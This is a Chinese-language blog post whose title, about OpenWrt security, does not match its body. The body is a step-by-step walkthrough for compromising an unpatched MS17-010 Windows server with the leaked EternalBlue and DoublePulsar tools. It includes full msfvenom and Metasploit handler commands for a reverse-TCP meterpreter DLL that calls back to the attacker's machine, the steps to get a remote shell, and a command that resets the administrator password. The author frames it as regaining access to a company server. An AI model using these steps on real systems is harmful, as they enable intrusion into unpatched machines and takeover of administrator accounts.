永恒之蓝病毒端口_openwrt安全性

1. 使用shadowbroker 的 eternalblue还有 doublepulsar 实现注入到目标机器的进程, 然后使用kali下的msf 获取到有病毒机器的shell 然后修改密码 查看问题等.

根据网上的教程来进行处理 以及复现等

教程地址:

http://blog.csdn.net/claygrit/article/details/77284739
http://blog.csdn.net/feier7501/article/details/8852113

1. 需要的环境以及软件：

    1. 目标机器 10.24.11.117 公司内的服务器，未更新微软永恒之蓝MS17-010补丁。

    2. Win7x86的机器 10.24.160.37  安装python2.6 安装pywin32 下载有shadowbroker-master的文件（包含 eternalblue 以及 doublepulsar）

    3. kali linux 机器， 主要是生成payload以及进行远程控制。

2. 步骤

    1. Win7x86的机器安装以及修改，

        安装python2.6×86 修改环境变量

       安装 pywin32 

      解压送 shadowbroker 的zip包 cd 到windows 目录下

     根据fb.py 新增加空目录 listeneringports 

     以及根据shadowbroker 里面的文件 修改resource 目录以及修改logs目录

    安装以及修改完成后。打开cmd 

    cd到shadowbroker…/windows的目录下  执行  fb.py

    开始自行操作

     输入target ip 地址 本次的例子中未 10.24.11.117

    callback 的ip地址是 win7的攻击机自己 地址是 10.24.160.37

    不适用重定向 输入 no 

    后面的自己选择 等着出来 fb> 就说明可以正常使用了

   2. 在fb> 后进行输入

     输入 use eternalblue

    一路next即可 在 选择 delivery mechanism 时选择FB

   提示 eternalblue successed 即可。 

3. 创建payload

   shell 到 kali linux中 执行命令

  其中 LHOST输入的时kali linux 自己的地址 端口号 理论上随便一个即可  msfvenom 的命令一点都不清楚 这一块需要继续加强学习

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.24.160.38 LPORT=5555 -f dll>launcher.dll

需要将launcher.dll 放到 win7x86的攻击机机器上面。 例子中时 10.24.168.37 比如 放到c:\launcher.dll

4. 还是在kali中： 输入命令 

msfconsole

打开msf框架，这里的目的 应该是开启监听 能够返回 上一步中生成的paylaod 在target ip 机器中的返回数据 用来操作被攻击的机器 

主要命令 第一步  应嘎是使用handler

为什么 不知道。。。 命令为：

use exploit/multi/handler

然后输入上一步相同的参数内容

set LHOST 10.24.160.38
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
exploit

提示started 即可

5. 返回win7x86的攻击机器

 应该还是在fb>的输入界面

直接输入 use doublepulsar 

一路next即可 就是搞清楚时x86 还是x64的目标机器 以及正确选中 第三步中生成的launcher.dll的路径以及文件名

以及选择 rundll的模式 后输入路径

正常的话 会提示 doublepulsar succeeded 即可

6. 再次返回 kali

  会提示 meterpreter session 1 opened 说明已经建立了链接

   回车会发现 还是会进入msf 的命令行 

这个时候输入 sessions 显示已经打开的链接

  然后执行命令 sessions -i 1 插入到链接中

这个时候 会发现命令提示符 会变成 meterpreter> 说明已经成功

这时 应该有很多挺好玩的玩法， 不过这里为了解决问题来搞的

所以这个时候 我选择输入 shell 会进入 c:\windows\system32\的命令行目录下 说明已经获取了 target 机器的shell权限

net user administrator newpassword 修改一下密码 自己就可以远程登录了。。

解决了 不知道是谁的机器 以及连不上的问题

这个地方有非常值得学习的地方msf 还有 shadowbroker 只是知道一点点的东西  还是太白了。。